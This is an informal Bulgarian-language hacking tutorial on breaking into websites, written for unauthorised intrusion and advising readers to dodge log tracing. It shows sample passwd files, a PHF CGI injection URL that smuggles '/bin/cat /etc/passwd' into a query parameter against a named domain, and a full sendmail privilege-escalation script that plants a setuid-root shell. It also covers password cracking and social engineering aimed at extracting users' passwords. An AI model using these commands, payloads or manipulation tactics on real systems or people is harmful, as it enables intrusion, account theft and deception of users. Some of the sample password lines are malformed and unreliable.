Хак на web site


E добре гадини! Май много искате да хакнете некой уеб пейдж, а?! Сега ще ви покажем как да стане тоя номер. Не е зле да се поровите из нет-а за други такива материали (можете да научите нещо все пак!!!). Ето сега...
Преди всичко трябва да се ПАЗИТЕ АДСКИ МНОГО защото ако хакнете нещо голямо оттам могат лесно да проверят log файловете да видят адреса Ви и да Ви дойдат на гости =]
АКО това Ви се стори доста сложно минете по-надолу, все ще се намери някакъв начин за хакване, а може и на Вас да Ви дойде
идеята. Все пак и сложните неща са направени от прости:)))))

oВзимане на парола през FTP

Един от най-лесните начини да направите това е през аnonymous ftp вход в дадена стрница. Сега... трябва малко да научите
password файла.


root:User:d7Bdg:1n2HG2:1127:20:Superuser
IvanIvanov:p5Y(h0tiC:1229:20:Ivan Ivanov,:/usr/people/ivanivanov:/bin/csh
RalicaPetrova:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/rpetrova:/bin/csh

Това е пример за един редовен password файл. Superuser - ът е частта която Ви дава root права. Това е същинската част на файла.

root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp

Това е още един пример на password файл, но има само малко различие, той е shadowed (затъмнен, засенчен, прикрит...).
Тези shadowed password файлове не позволяват да се види или да се копира истинската криптирана парола. Ето това вече създава
проблеми на кракера на пароли и diction maker - а. Отдолу има още един пример за shadowed password файл:


root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/
false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Затъмнените password файлове имат "х" на мястото на паролата. Сега ще си поговорим как да я кракнем.
Кракаването не е толкова сложно както изглежда, въпреки че файловете се променят от система към система.
1. Първото е да копирате или да си свалите файла.
2. След това трябва да намерите някой добър кракер или dictionary maker, но е много трудно! Има там некфи ама те са малко...
Малко са добритееее в бранша. Препоръчваме да потърсите Cracker Jack, John the Ripper, Brute Force Cracker или Jack the
Ripper. Сега за dictionary maker или "речников файл"... Когато стартирате крак програмата ще бъдете попитан за thepassword файла.
И ето сега за какво ни е dictionary maker - а. Какво всъщност е той? Това представлява програма, която комбинира всички
възможни комбанации с букви (ASCII, главни букви, малки букви, могат да се добавят и цифри). Такава програма можете да си
намерите навсякъде. Отидете в astalavista.com... а и при нас има такива програмки. След като вече разполагате с такава
следвайте инструкциите на програмата.

oPНF Техника


Това е един страхотен бъг, но повечето сървъри вече го усетиха и го остраниха. Това е най-простият начин за взимане на
парола, но става само в 95% от случаите, кофти... Единственото което трябва да направите е да си отворите browser - чето и
в полето където трябва да въведете адреса пишете:

http://nekav_web_site/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Например ако желаният сайт е mailpd.com в полето пишете:

http://www.mailpd.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Така си сваляте password файла и си го краквате.


oTELNET и експлойти


Ами експлоитите (exploits) са най-добрия начин да хакнете уеб сайт, но са толкова сложни както проникването през FTP.
За да започнете с експлойта трябва да разполагате с telnet клиент. Това става пак като го намерите в мрежата. Търсете...
Най-добре е да си вземете account с името на сайта, който искате да хакнете. Експлойтите разкриват бъговете и грешките на
дадена система и Ви позволяват да придобиете root права.
Има адски много експлойти за такава работа и пак трябва да се поровите малко... Ето Ви тука един известен като sendmail.
Всичко се прави през telnet:

cat << _EOF_ >/tmp/x.c
#define RUN "/bin/ksh"
#include
main()
{
execl(RUN,RUN,NULL);
}
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
main()
{
execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
main()
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" "
-f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi


oСоциална Инжинерия

Ето това е истина! Това не се учи! Това си е дарба. Най-лесно е да се поровите на някой user в сайта. Там той е написал кои
са любимите му групи, филми, актьори и др. Можем да се хванем на бас, че на 60% от user - ските сайтове паролите са написани
в самите тях. Номера е да накараш човека сам да Ви каже неговата парола с на пръв поглед безобидни битови въпроси. Та това е
социалната инжинерия...


Има ама още страшно много начини за хак на сайтове, но не е нужно да разкриваме всички сега и тук. Все пак ако всичко ни
беше дадено на готово доникъде намаше да стигнем. Глупостта на хората е много добро нещо! Зависи за коя страна, де... Също така разгледайте и "Хакване на сървър".


<От Неизвестен Хакер>